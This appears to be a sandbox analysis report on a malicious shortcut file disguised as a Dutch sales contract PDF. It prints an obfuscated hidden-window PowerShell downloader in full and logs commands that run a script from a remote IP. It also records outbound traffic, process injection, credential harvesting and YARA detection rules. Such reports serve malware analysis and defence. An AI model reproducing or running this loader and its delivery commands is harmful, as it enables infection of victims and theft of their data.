6El4Pu; j R x 6 l4 M;Di f,r ovS :K 1,n3 4Ri.Ch0Sk) S JuG GeFycSkkHoo r/ 2,l0Kr1Ph0 .0Sa1 a0Ov1P EtF .iTrrSee .fInoGexTi/Jo1 3,o4kr.Hi0';$Sorels=Valence 'FeU .StiES.RH -daaFeGTrEDeNUnT';$alters=Valence ' KhTetTet ppHysPi:ab/ a/ PwBrwUdwJ,.Rea .eb n BnOvaHua MrUntBe.A.d Se B/C w pUn- .iSkn cSalBouBadBaeJesMa/QuiSkm Fa AgR e Us /HjcPrr yMesPot ,aB l N/UdHsya egMug Va i H.tidRus rp';$Synthesizations=Valence 'fo>';$Reffed21=Valence 'Ali,peStX';$Speal='unincarnate';$Unvariation='\Serbiskes.Ali';Rosmus103 (Valence 'Bl$R.G .LEko LbE.aPrl A:.aAC funDtjAD NRisFen iI.uN.nG DSPr=Te$DyE an bV ,:OuAB PDepurdGeAA.t NASa+Sl$Pau onA v.nASmR IS ASyTU I,ooRen');Rosmus103 (Valence 'Ks$ igM lLnOFlBUnaSvLFi:FrGKoAPaSUntA rPso ppF,L ,aHysBetReySe=H $ViaSalXiTAaeUnrEnsSi.FeSElp olM IPrtB ( F$ RsAdYF,NSmT DH He MSPoiWiZUbATutS,I AoFoND SHa)');Rosmus103 (Valence $Ggen);$alters=$Gastroplasty[0];$Ascomycetal=(Valence 'Ca$K gCaLvrOMobudaBeL S:Frf iOUnrB.A Fn LSHuTC,A,el,pt.peTe=CaN ,ePuW.e-P oG.b RJRheSmcToT T Sks YU S.at fe umFo.De$ViPNoR GOAsGS RGua lm.hASkd rm aiC.n iAfS aTR r .a.rtBaI,ooT Nb,ePiN');Rosmus103 ($Ascomycetal);Rosmus103 (Valence ' B$AfFAdosorReaA.n jsA t oaD lMitbie S. KHs.eMaa.idste rP sIn[br$VeSSaoMerReeA l ,s,u]M =Yn$oplDaaBrm.op,elFaiNogMahT,tRee r');$Espressoers=Valence 'Af$ IF .oQur Sa nUnsBetF,aP,lB tN,e a.ChDM o KwSrnB l ao aChdTeF OiTml teP (In$HmaNelAntUneTir.isBo,.o$ sTrohE rduuGrsRot ,f uSpl en TeUnsUnsRu)';$Thrustfulness=$Afdansnings;Rosmus103 (Valence 'S.$RegL.lBrO,oB HAv LUd: Fa .m PA pTKrrKoe RS n.eEP =B (Alt.reNis Kto -GaP ,a.hT H . In$ ,T.ehStRs,UFosS t ufBeUFolsiN.lE ,s sko)');while (!$Amatrerne) {Rosmus103 (Valence 'Bi$ ,gMol yoSkb.ea nlFo:AnAMibTroJerJutE hProR,l,rd anVeiStnRigJe=Ky$N AAkn.ntAriRepSkrH i Se Os,at') ;Rosmus103 $Espressoers;Rosmus103 (Valence ' M[ oT UH aR e FA eDMeiThN Rg r. TNeh Gr.re JADiD p] r: ,: ks.alReEIneP,pA ( ,4P.0Ud0Kl0Ov)');Rosmus103 (Valence 'C $ ,GC l Ho ObT AS,lWo:FrAVomSeapot oRBiE eR nT e o= a( DT eIdS UtK - .PNoAraT Hko P$ HtBrH mrFoU GS .T BfRaU kLS NC ECasT se )') ;Rosmus103 (Valence ' o$ NGDeLM oA,BShAonL : oRP ASmnS dJeMFlO rAcn ReUnrI,NTee U= M$ SGQulRao ,B aShL e:C,NBuOOrNSadFlE N uA m .EAaRA,a abTil,aE c+Bo+F %Gl$ gTeA.asMaTH.RTrOLapTtlKoa ls tI YFr. tc eoS U OnFrt') ;$alters=$Gastroplasty[$randmornerne]}$Operationsbeskrivelsers=441444;$Bjergomraader=29090;Rosmus103 (Valence 'Wh$tiGVal eoUfb rASpLFo:.oCDiaP RTrG .aPl Ok= G PGImEfotUn- CMeomiNWaT SeGaNA T B D $ eT ,HA r kU nsRhtp.F Iu OLB ND.EDiSOvs');Rosmus103 (Valence 'Fi$GugNol noChbM,a TlSm: PCG oHontotSyu imF.a xIm2,v3B 3 o Fa= P m[BiS oySus Bt ee.amBu. SCFeoFun evUne srF.tCl]Hj: t:HeF WrKroSnmF B aa osBre 6Ph4SuSNat,pr i nSugSa( D$TaCL aTirTigstaFi)');Rosmus103 (Valence 'K.$H,GHalM.o TbDraHel V: BoAfr ne . =Br Ma[ArsFeYBuSC tFieBrM,r.TrT oEB x VT ,.T,E Sn ,cS,o tD ,i NFrgF,]Em: :Ska,nSDiCB.iSeIAn.NeG.re FT aSnaTG RUni YN SgCo(P,$EfcSooS.NPyTGeUSrMCaAClXfa2 3Bi3So)');Rosmus103 (Valence 'Un$ NGU.LKeoSnBChAUnlFl: eL oInVOrlUnyCydA I SGAuTBy=,e$L oKaRFoER.. Ss NUU b nS Pt Gr I rnTaGKi( B$ oo pGuespRIraChTCoi OCoN PSbeB,ee US MKKiR,si rV NeStLSus.lEKoRDes H,Wa$AnB RJCreTaR .G UO RM.nrSta ,a.ed AeUnRPe)');Rosmus103 $Lovlydigt;" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 28, 2025, 9:32 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (34 events)

Data sent	rngåîëº5-©E©C)c.>ºµiåä#ëËk/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîìª{qbùed¼LèªíhgiEãÒ«óFM/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîð/EÔ7sjÿJ¸. Ë:2NnûÊ0H&)/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîñöèÓø÷«xã`î]¥ÃTÐLÙô±=GÜ;/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîöAªãiÉ*7³ãAÛr¾zÊÐÑé/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîöÅ ¡s£þè³ÁCÃÍñ·@éLVx!áHí/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîûÇÒ)Òo(s`°ÄÓëè~¼4Ï i/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåîüËËÁÀlîà4aÒOKÖÑµÔõWW¶ø¥/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï£ør"SñqÂö¸*f"Ð,bãÕ¬`+iM/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï»Ñ4<Ik*Jdtö<Êµ¹ù¤bOu/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï/¤&)%} Ô½mÐQBÿ¼öðØú/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï÷`F~qØ[Hªî§Xôü¸V\|¦^(Ñú/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï¢<Åùel!© ÐÖ+SÉÂÆ +h²Ç4/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåïúöÒä¼á8ö4FS1Q"à²ÒV/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåïh§½*ZKdlñàí5)ÊY ED§n//5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåïá,øÉÈ³$*©¡ï:ó#À¦GüS/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåïãöx.Ùª»à3[D)·Ñz¢uÓé2/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåïÇ¥"âbcV}r>Ç¢îºÅü8¢Öî/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï~ÑBHº4ÊáKm}Íã.%®<J/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï)Ë W3!$0:,Fã÷KÐ8ú.ç,:/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï ýûI3ÅÙ{=e ÉÚîÜNLü¡`Tµ:è/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï Ïqx±ÔeÎEþÅÿdß¬çhFÖlg/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï%%ân1N\û»#åÉ½Kn/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï&Z¾}F{°¯ñ<' ÏAOµ`f/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï*ô£ÜqhRSÌ.åW; ~L=Ü/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï+³Bwò¿seTgÛ°W®óNAnKÅncô ôé/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï/sÄÙY °ØÙw«Ö9QiC{ÝÿcÖv/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï0¬¿ìïóòÕ2 ,½¼pí<1yg</5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï5¡«ýR¦¤»/Ïdâj·&ny¡"Q/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï5Vc°z°b<4« £Ü/Ä Ë äX Øù¹´¬Ú/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï:Öokr²caf¹ìö$_±þ$O¥òôu§¾¼/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï;R@ÙíõPU/Ì¿D1ì[´Ú òx^@a/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï?{×Ã¯>¢O¤Ùôki.ÔÇ°¤ËB/5 ÀÀÀ À 28-ÿwww.aennaart.de
Data sent	rngåï@¢ÃcXÄae:´áËüßw:áªqïr/5 ÀÀÀ À 28-ÿwww.aennaart.de

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 28, 2025, 9:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (39 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

powershell.exe -windowstyle hidden "Get-Service;$Bloddonationntolerancerne='func';Get-History;$Bloddonationntolerancerne+='t';Get-History;$Bloddonationntolerancerne+='i';$Overscepticalness=Get-History;$Bloddonationntolerancerne+='on:';(ni -p $Bloddonationntolerancerne -n Valence -value { param($Analysable);$Bloddonation=2;do {$Advarselsmeddelelsen+=$Analysable[$Bloddonation];$Bloddonation+=3} until(!$Analysable[$Bloddonation])$Advarselsmeddelelsen});ConvertTo-Html;(ni -p $Bloddonationntolerancerne -n Rosmus103 -value {param($Ditikerne);.($Reffed21) ($Ditikerne)});ConvertTo-Html;$Programadministrationen=Valence 'Fon TEWet r.P.W';$Programadministrationen+=Valence 'kreA BHac ol oI tEW.N at';$lamplighter=Valence 'CoM po ez oiV lTrlA aDa/';$Unpompously=Valence 'amTDal s j1 a2';$Ggen='Kl[FaNAfeViTSp.,asamEByRBrvSviBec e Wp OGlISknAlTUnMMoa MNEpaToG E BRF,]Ca:S :Ins ,ePrCL UFir I KtReY hp rP.oPrT FOTeC Fo iLAu=Se$ReU Ln.lp RO.eMRhpO OS.U Ks .l nY';$lamplighter+=Valence 'An5 m.Ap0Go l(UlW Ei.kn dSoo RwTis P NA,Tf My1 r0Pr. x0Co;a PrW SiGanS 6El4Pu; j R x 6 l4 M;Di f,r ovS :K 1,n3 4Ri.Ch0Sk) S JuG GeFycSkkHoo r/ 2,l0Kr1Ph0 .0Sa1 a0Ov1P EtF .iTrrSee .fInoGexTi/Jo1 3,o4kr.Hi0';$Sorels=Valence 'FeU .StiES.RH -daaFeGTrEDeNUnT';$alters=Valence ' KhTetTet ppHysPi:ab/ a/ PwBrwUdwJ,.Rea .eb n BnOvaHua MrUntBe.A.d Se B/C w pUn- .iSkn cSalBouBadBaeJesMa/QuiSkm Fa AgR e Us /HjcPrr yMesPot ,aB l N/UdHsya egMug Va i H.tidRus rp';$Synthesizations=Valence 'fo>';$Reffed21=Valence 'Ali,peStX';$Speal='unincarnate';$Unvariation='\Serbiskes.Ali';Rosmus103 (Valence 'Bl$R.G .LEko LbE.aPrl A:.aAC funDtjAD NRisFen iI.uN.nG DSPr=Te$DyE an bV ,:OuAB PDepurdGeAA.t NASa+Sl$Pau onA v.nASmR IS ASyTU I,ooRen');Rosmus103 (Valence 'Ks$ igM lLnOFlBUnaSvLFi:FrGKoAPaSUntA rPso ppF,L ,aHysBetReySe=H $ViaSalXiTAaeUnrEnsSi.FeSElp olM IPrtB ( F$ RsAdYF,NSmT DH He MSPoiWiZUbATutS,I AoFoND SHa)');Rosmus103 (Valence $Ggen);$alters=$Gastroplasty[0];$Ascomycetal=(Valence 'Ca$K gCaLvrOMobudaBeL S:Frf iOUnrB.A Fn LSHuTC,A,el,pt.peTe=CaN ,ePuW.e-P oG.b RJRheSmcToT T Sks YU S.at fe umFo.De$ViPNoR GOAsGS RGua lm.hASkd rm aiC.n iAfS aTR r .a.rtBaI,ooT Nb,ePiN');Rosmus103 ($Ascomycetal);Rosmus103 (Valence ' B$AfFAdosorReaA.n jsA t oaD lMitbie S. KHs.eMaa.idste rP sIn[br$VeSSaoMerReeA l ,s,u]M =Yn$oplDaaBrm.op,elFaiNogMahT,tRee r');$Espressoers=Valence 'Af$ IF .oQur Sa nUnsBetF,aP,lB tN,e a.ChDM o KwSrnB l ao aChdTeF OiTml teP (In$HmaNelAntUneTir.isBo,.o$ sTrohE rduuGrsRot ,f uSpl en TeUnsUnsRu)';$Thrustfulness=$Afdansnings;Rosmus103 (Valence 'S.$RegL.lBrO,oB HAv LUd: Fa .m PA pTKrrKoe RS n.eEP =B (Alt.reNis Kto -GaP ,a.hT H . In$ ,T.ehStRs,UFosS t ufBeUFolsiN.lE ,s sko)');while (!$Amatrerne) {Rosmus103 (Valence 'Bi$ ,gMol yoSkb.ea nlFo:AnAMibTroJerJutE hProR,l,rd anVeiStnRigJe=Ky$N AAkn.ntAriRepSkrH i Se Os,at') ;Rosmus103 $Espressoers;Rosmus103 (Valence ' M[ oT UH aR e FA eDMeiThN Rg r. TNeh Gr.re JADiD p] r: ,: ks.alReEIneP,pA ( ,4P.0Ud0Kl0Ov)');Rosmus103 (Valence 'C $ ,GC l Ho ObT AS,lWo:FrAVomSeapot oRBiE eR nT e o= a( DT eIdS UtK - .PNoAraT Hko P$ HtBrH mrFoU GS .T BfRaU kLS NC ECasT se )') ;Rosmus103 (Valence ' o$ NGDeLM oA,BShAonL : oRP ASmnS dJeMFlO rAcn ReUnrI,NTee U= M$ SGQulRao ,B aShL e:C,NBuOOrNSadFlE N uA m .EAaRA,a abTil,aE c+Bo+F %Gl$ gTeA.asMaTH.RTrOLapTtlKoa ls tI YFr. tc eoS U OnFrt') ;$alters=$Gastroplasty[$randmornerne]}$Operationsbeskrivelsers=441444;$Bjergomraader=29090;Rosmus103 (Valence 'Wh$tiGVal eoUfb rASpLFo:.oCDiaP RTrG .aPl Ok= G PGImEfotUn- CMeomiNWaT SeGaNA T B D $ eT ,HA r kU nsRhtp.F Iu OLB ND.EDiSOvs');Rosmus103 (Valence 'Fi$GugNol noChbM,a TlSm: PCG oHontotSyu imF.a xIm2,v3B 3 o Fa= P m[BiS oySus Bt ee.amBu. SCFeoFun evUne srF.tCl]Hj: t:HeF WrKroSnmF B aa osBre 6Ph4SuSNat,pr i nSugSa( D$TaCL aTirTigstaFi)');Rosmus103 (Valence 'K.$H,GHalM.o TbDraHel V: BoAfr ne . =Br Ma[ArsFeYBuSC tFieBrM,r.TrT oEB x VT ,.T,E Sn ,cS,o tD ,i NFrgF,]Em: :Ska,nSDiCB.iSeIAn.NeG.re FT aSnaTG RUni YN SgCo(P,$EfcSooS.NPyTGeUSrMCaAClXfa2 3Bi3So)');Rosmus103 (Valence 'Un$ NGU.LKeoSnBChAUnlFl: eL oInVOrlUnyCydA I SGAuTBy=,e$L oKaRFoER.. Ss NUU b nS Pt Gr I rnTaGKi( B$ oo pGuespRIraChTCoi OCoN PSbeB,ee US MKKiR,si rV NeStLSus.lEKoRDes H,Wa$AnB RJCreTaR .G UO RM.nrSta ,a.ed AeUnRPe)');Rosmus103 $Lovlydigt;"

Communicates with host for which no DNS query was performed (1 event)

host

196.251.90.185

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusW March 28, 2025, 9:35 a.m.	service_handle: 0x0044dfb0 service_type: 48 service_status: 3		0	0

Harvests credentials from local email clients (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Mozilla Thunderbird\Capabilities\Hidden

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (34 events)

Time & API	Arguments	Status	Return
send March 28, 2025, 9:35 a.m.	buffer: rngåîëº5-©E©C)c.>ºµiåä#ëËk/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1304 sent: 119	1	119
send March 28, 2025, 9:35 a.m.	buffer: rngåîìª{qbùed¼LèªíhgiEãÒ«óFM/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1304 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîð/EÔ7sjÿJ¸. Ë:2NnûÊ0H&)/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîñöèÓø÷«xã`î]¥ÃTÐLÙô±=GÜ;/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîöAªãiÉ*7³ãAÛr¾zÊÐÑé/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîöÅ ¡s£þè³ÁCÃÍñ·@éLVx!áHí/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîûÇÒ)Òo(s`°ÄÓëè~¼4Ï i/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåîüËËÁÀlîà4aÒOKÖÑµÔõWW¶ø¥/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï£ør"SñqÂö¸*f"Ð,bãÕ¬`+iM/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï»Ñ4<Ik*Jdtö<Êµ¹ù¤bOu/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï/¤&)%} Ô½mÐQBÿ¼öðØú/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï÷`F~qØ[Hªî§Xôü¸V\|¦^(Ñú/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï¢<Åùel!© ÐÖ+SÉÂÆ +h²Ç4/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåïúöÒä¼á8ö4FS1Q"à²ÒV/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåïh§½*ZKdlñàí5)ÊY ED§n//5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåïá,øÉÈ³$*©¡ï:ó#À¦GüS/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåïãöx.Ùª»à3[D)·Ñz¢uÓé2/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåïÇ¥"âbcV}r>Ç¢îºÅü8¢Öî/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï~ÑBHº4ÊáKm}Íã.%®<J/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï)Ë W3!$0:,Fã÷KÐ8ú.ç,:/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï ýûI3ÅÙ{=e ÉÚîÜNLü¡`Tµ:è/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï Ïqx±ÔeÎEþÅÿdß¬çhFÖlg/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1120 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï%%ân1N\û»#åÉ½Kn/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1244 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï&Z¾}F{°¯ñ<' ÏAOµ`f/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1244 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï*ô£ÜqhRSÌ.åW; ~L=Ü/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1244 sent: 119	1	119
send March 28, 2025, 9:36 a.m.	buffer: rngåï+³Bwò¿seTgÛ°W®óNAnKÅncô ôé/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1244 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï/sÄÙY °ØÙw«Ö9QiC{ÝÿcÖv/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï0¬¿ìïóòÕ2 ,½¼pí<1yg</5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï5¡«ýR¦¤»/Ïdâj·&ny¡"Q/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï5Vc°z°b<4« £Ü/Ä Ë äX Øù¹´¬Ú/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï:Öokr²caf¹ìö$_±þ$O¥òôu§¾¼/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï;R@ÙíõPU/Ì¿D1ì[´Ú òx^@a/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï?{×Ã¯>¢O¤Ùôki.ÔÇ°¤ËB/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119
send March 28, 2025, 9:37 a.m.	buffer: rngåï@¢ÃcXÄae:´áËüßw:áªqïr/5 ÀÀÀ À 28-ÿwww.aennaart.de socket: 1252 sent: 119	1	119

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c\\196.251.90.185@36123\Doku\Glaserende.cmd
parent_process	wscript.exe				martian_process	cmd.exe /c\\196.251.90.185@36123\Doku\Glaserende.cmd

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3020 resumed a thread in remote process 2448
Process injection	Process 2472 resumed a thread in remote process 1680
NtResumeThread March 28, 2025, 9:33 a.m.	thread_handle: 0x00000478 suspend_count: 1 process_identifier: 2448	1	0	0
NtResumeThread March 28, 2025, 9:35 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1680	1	0	0

Creates a suspicious Powershell process (1 event)

option

-windowstyle hidden

value

Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Verkoopcontract Data Markus.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All